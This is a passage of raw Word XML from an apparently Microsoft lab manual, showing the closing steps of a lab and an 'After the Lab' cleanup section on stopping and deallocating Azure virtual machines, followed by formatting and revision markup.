          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>At this point you are done with these labs.</w:t>
      </w:r>
      <w:r w:rsidR="00460453">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Well done!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769CEB0F" w14:textId="0B088429" w:rsidR="000E7A21" w:rsidRDefault="000E7A21" w:rsidP="00DF3BA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Provide answers to all Check Points in a document (*.docx, *.pdf).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015FAF8" w14:textId="06F8160D" w:rsidR="00F94A05" w:rsidRDefault="00F94A05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="272EC8E8" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRPr="00F954C8" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc526233453"/>
      <w:bookmarkStart w:id="68" w:name="_Toc526235187"/>
      <w:bookmarkStart w:id="69" w:name="_Toc44075697"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After the Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE42D3" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRPr="00C6425D" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Duration: 10 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B66AA1" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRPr="00C6425D" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this exercise, attendees will deprovision any Azure resources that were created in support of the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E254B07" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc526172147"/>
      <w:bookmarkStart w:id="71" w:name="_Toc526182058"/>
      <w:bookmarkStart w:id="72" w:name="_Toc526233454"/>
      <w:bookmarkStart w:id="73" w:name="_Toc526235188"/>
      <w:bookmarkStart w:id="74" w:name="_Toc44075698"/>
      <w:r>
        <w:t>Task 1: Stop and deallocated all the VMs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="17BC0949" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Properly shutdown all the VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD02C6" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deallocate the VM in the Azure Portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252023D3" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To Stop a VM, simply click on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unclaim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B0A7A" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRDefault="00F94A05" w:rsidP="00F94A05"/>
    <w:p w14:paraId="0B9DC656" w14:textId="77777777" w:rsidR="00F94A05" w:rsidRPr="003F2250" w:rsidRDefault="00F94A05" w:rsidP="00F94A05">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ECE86D1" wp14:editId="1416D4E6">
            <wp:extent cx="5765388" cy="1644782"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="6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7672A4F2" w14:textId="77777777" w:rsidR="00FB7B13" w:rsidRPr="00C6425D" w:rsidRDefault="00FB7B13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A7E886" w14:textId="77777777" w:rsidR="0045498F" w:rsidRDefault="0045498F" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DE523C" w14:textId="452B50D6" w:rsidR="0042651F" w:rsidRDefault="0042651F">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sectPr w:rsidR="0042651F" w:rsidSect="000849CB">
      <w:headerReference w:type="even" r:id="rId78"/>
      <w:headerReference w:type="default" r:id="rId79"/>
      <w:footerReference w:type="even" r:id="rId80"/>
      <w:footerReference w:type="default" r:id="rId81"/>
      <w:headerReference w:type="first" r:id="rId82"/>
      <w:footerReference w:type="first" r:id="rId8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8EEA3" w14:textId="77777777" w:rsidR="00017429" w:rsidRPr="007E3D91" w:rsidRDefault="00017429" w:rsidP="007E3D91">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5FDADE4E" w14:textId="77777777" w:rsidR="00017429" w:rsidRPr="007E3D91" w:rsidRDefault="00017429" w:rsidP="007E3D91">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="141DCA2B" w14:textId="77777777" w:rsidR="00017429" w:rsidRDefault="00017429"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6B573DCA" w:rsidR="004E5A8C" w:rsidRDefault="004E5A8C" w:rsidP="00D53599">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="10800"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve"> ©20</w:t>
    </w:r>
    <w:r w:rsidR="007621D5">
      <w:t>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sdtContent>
    </w:sdt>
  </w:p>
  <w:p w14:paraId="6537F28F" w14:textId="77777777" w:rsidR="004E5A8C" w:rsidRDefault="004E5A8C"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04BAC318" w:rsidR="004E5A8C" w:rsidRDefault="004E5A8C"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2907DD">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>2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7621D5">
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidRPr="007E3D91">
          <w:t xml:space="preserve"> Microsoft Corporation</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="637805D2" w14:textId="77777777" w:rsidR="004E5A8C" w:rsidRPr="007E3D91" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRDefault="004E5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C0E3" w14:textId="77777777" w:rsidR="00017429" w:rsidRPr="007E3D91" w:rsidRDefault="00017429" w:rsidP="007E3D91">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1FF67D38" w14:textId="77777777" w:rsidR="00017429" w:rsidRPr="007E3D91" w:rsidRDefault="00017429" w:rsidP="007E3D91">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="6C8BE1DE" w14:textId="77777777" w:rsidR="00017429" w:rsidRDefault="00017429"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4E5A8C" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRPr="000849CB" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRPr="000849CB" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRPr="0016086A" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRDefault="004E5A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4E5A8C" w:rsidRPr="000849CB" w:rsidRDefault="004E5A8C"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p w14:paraId="463F29E8" w14:textId="77777777" w:rsidR="004E5A8C" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRPr="000849CB" w:rsidRDefault="004E5A8C"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4E5A8C" w:rsidRDefault="004E5A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533"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53205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558E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3940930"/>
    <w:lvl w:ilvl="0" w:tplc="71786FE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>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7FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="911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5B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E06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2BEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED3E2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5238"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A28C3F7A"/>
    <w:lvl w:ilvl="0" w:tplc="3EE2E6F4">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A1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="036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B4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A11E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771F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4AE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A31EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13063BEA"/>
    <w:lvl w:ilvl="0" w:tplc="5C4E8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39E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ED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D2699"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B4006A8"/>
    <w:lvl w:ilvl="0" w:tplc="CA0A6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80676"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6360E30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024749"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8624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02CF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C524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043A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D38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3651"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36E2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377567A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A11E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63335"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE52762E"/>
    <w:lvl w:ilvl="0" w:tplc="ABAA11D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602F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6142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9195C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="682CF49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D85EE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD8E4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A6A9A"/>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20BD5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19F05902"/>
    <w:lvl w:ilvl="0" w:tplc="0B9CA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5779C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFFA3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F70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E82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63C8785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51249"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4694F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795337BC"/>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5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="4"/>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33"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="3"/>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615"/>
    <w:rsid w:val="00006A1F"/>
    <w:rsid w:val="000070A2"/>
    <w:rsid w:val="00011464"/>
    <w:rsid w:val="00012030"/>
    <w:rsid w:val="00013941"/>
    <w:rsid w:val="00014BAB"/>
    <w:rsid w:val="00016ECA"/>
    <w:rsid w:val="00017429"/>
    <w:rsid w:val="000179C9"/>
    <w:rsid w:val="00021538"/>
    <w:rsid w:val="00021904"/>
    <w:rsid w:val="00021D50"/>
    <w:rsid w:val="000228D9"/>
    <w:rsid w:val="00022A89"/>
    <w:rsid w:val="00022E30"/>
    <w:rsid w:val="000230D5"/>
    <w:rsid w:val="00024492"/>
    <w:rsid w:val="0002458F"/>
    <w:rsid w:val="00027691"/>
    <w:rsid w:val="0003185F"/>
    <w:rsid w:val="00031CF7"/>
    <w:rsid w:val="00037C3F"/>
    <w:rsid w:val="000429BE"/>
    <w:rsid w:val="00044785"/>
    <w:rsid w:val="000454E4"/>
    <w:rsid w:val="00045EE1"/>
    <w:rsid w:val="00046D7A"/>
    <w:rsid w:val="00047911"/>
    <w:rsid w:val="000479F6"/>
    <w:rsid w:val="000503AC"/>
    <w:rsid w:val="00051A51"/>
    <w:rsid w:val="00051B51"/>
    <w:rsid w:val="00051EC7"/>
    <w:rsid w:val="00052031"/>
    <w:rsid w:val="00052434"/>
    <w:rsid w:val="0005297A"/>
    <w:rsid w:val="00052F21"/>
    <w:rsid w:val="000530BE"/>
    <w:rsid w:val="000532B9"/>
    <w:rsid w:val="00056AF5"/>
    <w:rsid w:val="0005734C"/>
    <w:rsid w:val="00057C19"/>
    <w:rsid w:val="00057D6A"/>
    <w:rsid w:val="00060FF2"/>
    <w:rsid w:val="00061A6F"/>
    <w:rsid w:val="0006240D"/>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6C54"/>
    <w:rsid w:val="00077C63"/>
    <w:rsid w:val="000804D2"/>
    <w:rsid w:val="00080695"/>
    <w:rsid w:val="00081837"/>
    <w:rsid w:val="00082C7E"/>
    <w:rsid w:val="0008471E"/>
    <w:rsid w:val="000849CB"/>
    <w:rsid w:val="00084DC7"/>
    <w:rsid w:val="000860D8"/>
    <w:rsid w:val="00086A9F"/>
    <w:rsid w:val="00086CB8"/>
    <w:rsid w:val="0009477C"/>
    <w:rsid w:val="00097527"/>
    <w:rsid w:val="00097904"/>
    <w:rsid w:val="000A1126"/>
    <w:rsid w:val="000A14E3"/>
    <w:rsid w:val="000A18EC"/>
    <w:rsid w:val="000A40C0"/>
    <w:rsid w:val="000A4F49"/>
    <w:rsid w:val="000A78C9"/>
    <w:rsid w:val="000A7FAF"/>
    <w:rsid w:val="000B085A"/>
    <w:rsid w:val="000B0ED2"/>
    <w:rsid w:val="000B1786"/>
    <w:rsid w:val="000B17D6"/>
    <w:rsid w:val="000B3AC2"/>
    <w:rsid w:val="000B4818"/>
    <w:rsid w:val="000B4AE7"/>
    <w:rsid w:val="000B55EE"/>
    <w:rsid w:val="000C1D6F"/>
    <w:rsid w:val="000C352A"/>
    <w:rsid w:val="000C5543"/>
    <w:rsid w:val="000C6667"/>
    <w:rsid w:val="000C7B88"/>
    <w:rsid w:val="000D1227"/>
    <w:rsid w:val="000D4481"/>
    <w:rsid w:val="000D473F"/>
    <w:rsid w:val="000D4F07"/>
    <w:rsid w:val="000D5103"/>
    <w:rsid w:val="000D6FD3"/>
    <w:rsid w:val="000E1701"/>
    <w:rsid w:val="000E3146"/>
    <w:rsid w:val="000E3E51"/>
    <w:rsid w:val="000E5D72"/>
    <w:rsid w:val="000E6167"/>
    <w:rsid w:val="000E70AE"/>
    <w:rsid w:val="000E7A21"/>
    <w:rsid w:val="000F02D8"/>
    <w:rsid w:val="000F2A57"/>
    <w:rsid w:val="000F2D31"/>
    <w:rsid w:val="000F3839"/>
    <w:rsid w:val="000F3D1E"/>
    <w:rsid w:val="000F3DD7"/>
    <w:rsid w:val="000F412A"/>
    <w:rsid w:val="000F4957"/>
    <w:rsid w:val="000F4CF5"/>
    <w:rsid w:val="000F4F86"/>
    <w:rsid w:val="000F52CD"/>
    <w:rsid w:val="000F54A9"/>
    <w:rsid w:val="000F664F"/>
    <w:rsid w:val="000F6DD9"/>
    <w:rsid w:val="000F7194"/>
    <w:rsid w:val="000F7D46"/>
    <w:rsid w:val="00100676"/>
    <w:rsid w:val="001017DB"/>
    <w:rsid w:val="00103C6B"/>
    <w:rsid w:val="00103DAF"/>
    <w:rsid w:val="00103F0A"/>
    <w:rsid w:val="00105D6D"/>
    <w:rsid w:val="00110012"/>
    <w:rsid w:val="00110A8A"/>
    <w:rsid w:val="00111573"/>
    <w:rsid w:val="00113760"/>
    <w:rsid w:val="0011397E"/>
    <w:rsid w:val="00113DC7"/>
    <w:rsid w:val="00114B3C"/>
    <w:rsid w:val="00115859"/>
    <w:rsid w:val="001164B1"/>
    <w:rsid w:val="00120830"/>
    <w:rsid w:val="00120DF6"/>
    <w:rsid w:val="00121382"/>
    <w:rsid w:val="00122002"/>
    <w:rsid w:val="0012295A"/>
    <w:rsid w:val="00122AF2"/>
    <w:rsid w:val="00122DB5"/>
    <w:rsid w:val="00123AD7"/>
    <w:rsid w:val="0012435E"/>
    <w:rsid w:val="0013001F"/>
    <w:rsid w:val="0013017C"/>
    <w:rsid w:val="001301FA"/>
    <w:rsid w:val="0013344D"/>
    <w:rsid w:val="00133914"/>
    <w:rsid w:val="00133B32"/>
    <w:rsid w:val="00135299"/>
    <w:rsid w:val="001368EC"/>
    <w:rsid w:val="00136CFF"/>
    <w:rsid w:val="0013704D"/>
    <w:rsid w:val="0013776F"/>
    <w:rsid w:val="00137770"/>
    <w:rsid w:val="00137CD6"/>
    <w:rsid w:val="001457D2"/>
    <w:rsid w:val="0014795D"/>
    <w:rsid w:val="00147DF0"/>
    <w:rsid w:val="00150099"/>
    <w:rsid w:val="00151025"/>
    <w:rsid w:val="001515EC"/>
    <w:rsid w:val="001553B8"/>
    <w:rsid w:val="00155DE7"/>
    <w:rsid w:val="00157C2D"/>
    <w:rsid w:val="0016039D"/>
    <w:rsid w:val="0016086A"/>
    <w:rsid w:val="001613B8"/>
    <w:rsid w:val="001615AA"/>
    <w:rsid w:val="00162511"/>
    <w:rsid w:val="00163943"/>
    <w:rsid w:val="00165312"/>
    <w:rsid w:val="00165F92"/>
    <w:rsid w:val="001663EE"/>
    <w:rsid w:val="00170AA7"/>
    <w:rsid w:val="001712A9"/>
    <w:rsid w:val="0017137F"/>
    <w:rsid w:val="00171AF4"/>
    <w:rsid w:val="00171B49"/>
    <w:rsid w:val="00172745"/>
    <w:rsid w:val="00173CEF"/>
    <w:rsid w:val="00174441"/>
    <w:rsid w:val="0017474F"/>
    <w:rsid w:val="001757EC"/>
    <w:rsid w:val="0017615B"/>
    <w:rsid w:val="001776D6"/>
    <w:rsid w:val="00181343"/>
    <w:rsid w:val="00181D33"/>
    <w:rsid w:val="00182068"/>
    <w:rsid w:val="001850B4"/>
    <w:rsid w:val="00190407"/>
    <w:rsid w:val="001907F2"/>
    <w:rsid w:val="001927EA"/>
    <w:rsid w:val="00192C74"/>
    <w:rsid w:val="00193CE3"/>
    <w:rsid w:val="0019658F"/>
    <w:rsid w:val="0019682B"/>
    <w:rsid w:val="00196CE2"/>
    <w:rsid w:val="0019739C"/>
    <w:rsid w:val="0019758E"/>
    <w:rsid w:val="001A039D"/>
    <w:rsid w:val="001A1397"/>
    <w:rsid w:val="001A201A"/>
    <w:rsid w:val="001A27D7"/>
    <w:rsid w:val="001A2A27"/>
    <w:rsid w:val="001A3511"/>
    <w:rsid w:val="001A47E1"/>
    <w:rsid w:val="001A6193"/>
    <w:rsid w:val="001A6436"/>
    <w:rsid w:val="001A66C6"/>
    <w:rsid w:val="001A684D"/>
    <w:rsid w:val="001A6952"/>
    <w:rsid w:val="001A7631"/>
    <w:rsid w:val="001B1CED"/>
    <w:rsid w:val="001B1FD3"/>
    <w:rsid w:val="001B249B"/>
    <w:rsid w:val="001B315B"/>
    <w:rsid w:val="001B3712"/>
    <w:rsid w:val="001B528A"/>
    <w:rsid w:val="001B5E32"/>
    <w:rsid w:val="001B616E"/>
    <w:rsid w:val="001B7140"/>
    <w:rsid w:val="001B75F6"/>
    <w:rsid w:val="001C0A7F"/>
    <w:rsid w:val="001C0CB4"/>
    <w:rsid w:val="001C18ED"/>
    <w:rsid w:val="001C358B"/>
    <w:rsid w:val="001C42FC"/>
    <w:rsid w:val="001C4D94"/>
    <w:rsid w:val="001C638A"/>
    <w:rsid w:val="001C7A95"/>
    <w:rsid w:val="001D0546"/>
    <w:rsid w:val="001D1219"/>
    <w:rsid w:val="001D1BDA"/>
    <w:rsid w:val="001D2D31"/>
    <w:rsid w:val="001D3237"/>
    <w:rsid w:val="001D46F2"/>
    <w:rsid w:val="001D59B0"/>
    <w:rsid w:val="001D66D2"/>
    <w:rsid w:val="001D7DB6"/>
    <w:rsid w:val="001E05B0"/>
    <w:rsid w:val="001E09BB"/>
    <w:rsid w:val="001E1037"/>
    <w:rsid w:val="001E3187"/>
    <w:rsid w:val="001E363C"/>
    <w:rsid w:val="001E5824"/>
    <w:rsid w:val="001F02C1"/>
    <w:rsid w:val="001F0948"/>
    <w:rsid w:val="001F0D2A"/>
    <w:rsid w:val="001F1D05"/>
    <w:rsid w:val="001F21CD"/>
    <w:rsid w:val="001F22CE"/>
    <w:rsid w:val="001F317D"/>
    <w:rsid w:val="001F4E86"/>
    <w:rsid w:val="001F6F98"/>
    <w:rsid w:val="00200E5F"/>
    <w:rsid w:val="00201088"/>
    <w:rsid w:val="0020673E"/>
    <w:rsid w:val="00210423"/>
    <w:rsid w:val="00210B5D"/>
    <w:rsid w:val="0021138A"/>
    <w:rsid w:val="00211C44"/>
    <w:rsid w:val="002127B2"/>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37C03"/>
    <w:rsid w:val="002439E0"/>
    <w:rsid w:val="00243D31"/>
    <w:rsid w:val="00245A9F"/>
    <w:rsid w:val="00245FDD"/>
    <w:rsid w:val="00246EAF"/>
    <w:rsid w:val="0024799F"/>
    <w:rsid w:val="00247D9C"/>
    <w:rsid w:val="00251528"/>
    <w:rsid w:val="0025217C"/>
    <w:rsid w:val="002527D3"/>
    <w:rsid w:val="00254CAC"/>
    <w:rsid w:val="00254EF8"/>
    <w:rsid w:val="00255420"/>
    <w:rsid w:val="002576B5"/>
    <w:rsid w:val="002627EF"/>
    <w:rsid w:val="0026512D"/>
    <w:rsid w:val="002666B6"/>
    <w:rsid w:val="00266C3A"/>
    <w:rsid w:val="002678C2"/>
    <w:rsid w:val="00270435"/>
    <w:rsid w:val="002708B4"/>
    <w:rsid w:val="00270AE7"/>
    <w:rsid w:val="00271AC4"/>
    <w:rsid w:val="00273538"/>
    <w:rsid w:val="00273744"/>
    <w:rsid w:val="0027468D"/>
    <w:rsid w:val="00274E9E"/>
    <w:rsid w:val="0027525D"/>
    <w:rsid w:val="0027617C"/>
    <w:rsid w:val="0027763B"/>
    <w:rsid w:val="0028388D"/>
    <w:rsid w:val="00283EAC"/>
    <w:rsid w:val="0028461B"/>
    <w:rsid w:val="0028569A"/>
    <w:rsid w:val="00287656"/>
    <w:rsid w:val="002907DD"/>
    <w:rsid w:val="00290E1B"/>
    <w:rsid w:val="002930B6"/>
    <w:rsid w:val="002935F3"/>
    <w:rsid w:val="00294B42"/>
    <w:rsid w:val="00295DCD"/>
    <w:rsid w:val="00296128"/>
    <w:rsid w:val="00296989"/>
    <w:rsid w:val="00297ECF"/>
    <w:rsid w:val="002A0647"/>
    <w:rsid w:val="002A0A79"/>
    <w:rsid w:val="002A0CAE"/>
    <w:rsid w:val="002A1C43"/>
    <w:rsid w:val="002A32EE"/>
    <w:rsid w:val="002A353F"/>
    <w:rsid w:val="002A3ACA"/>
    <w:rsid w:val="002A460B"/>
    <w:rsid w:val="002A5B52"/>
    <w:rsid w:val="002A6A77"/>
    <w:rsid w:val="002B1D87"/>
    <w:rsid w:val="002B1FFF"/>
    <w:rsid w:val="002B24B1"/>
    <w:rsid w:val="002B2B20"/>
    <w:rsid w:val="002B2DB6"/>
    <w:rsid w:val="002B3C8B"/>
    <w:rsid w:val="002B4B68"/>
    <w:rsid w:val="002B5EF4"/>
    <w:rsid w:val="002B6913"/>
    <w:rsid w:val="002B7714"/>
    <w:rsid w:val="002C0206"/>
    <w:rsid w:val="002C04EB"/>
    <w:rsid w:val="002C2009"/>
    <w:rsid w:val="002C28D9"/>
    <w:rsid w:val="002C3864"/>
    <w:rsid w:val="002C3EFB"/>
    <w:rsid w:val="002C41E1"/>
    <w:rsid w:val="002C6059"/>
    <w:rsid w:val="002C6536"/>
    <w:rsid w:val="002C7496"/>
    <w:rsid w:val="002D32D7"/>
    <w:rsid w:val="002D3DBA"/>
    <w:rsid w:val="002D4C6F"/>
    <w:rsid w:val="002D6548"/>
    <w:rsid w:val="002D6CA4"/>
    <w:rsid w:val="002D6E40"/>
    <w:rsid w:val="002D6FEC"/>
    <w:rsid w:val="002E1FA4"/>
    <w:rsid w:val="002E2A9B"/>
    <w:rsid w:val="002E2BD4"/>
    <w:rsid w:val="002E31B0"/>
    <w:rsid w:val="002E3706"/>
    <w:rsid w:val="002E7D8E"/>
    <w:rsid w:val="002F01A9"/>
    <w:rsid w:val="002F2B49"/>
    <w:rsid w:val="002F346A"/>
    <w:rsid w:val="002F45DB"/>
    <w:rsid w:val="002F484F"/>
    <w:rsid w:val="002F5BB7"/>
    <w:rsid w:val="002F63B1"/>
    <w:rsid w:val="002F6706"/>
    <w:rsid w:val="00300666"/>
    <w:rsid w:val="00305484"/>
    <w:rsid w:val="00306948"/>
    <w:rsid w:val="00306E93"/>
    <w:rsid w:val="00312A3A"/>
    <w:rsid w:val="00312ACF"/>
    <w:rsid w:val="00314283"/>
    <w:rsid w:val="00315200"/>
    <w:rsid w:val="00316A20"/>
    <w:rsid w:val="00321848"/>
    <w:rsid w:val="00321EB4"/>
    <w:rsid w:val="0032213C"/>
    <w:rsid w:val="00322271"/>
    <w:rsid w:val="00322E33"/>
    <w:rsid w:val="003251D0"/>
    <w:rsid w:val="00326940"/>
    <w:rsid w:val="0032791A"/>
    <w:rsid w:val="00330AA7"/>
    <w:rsid w:val="00330D26"/>
    <w:rsid w:val="003362EF"/>
    <w:rsid w:val="003445F1"/>
    <w:rsid w:val="003452D9"/>
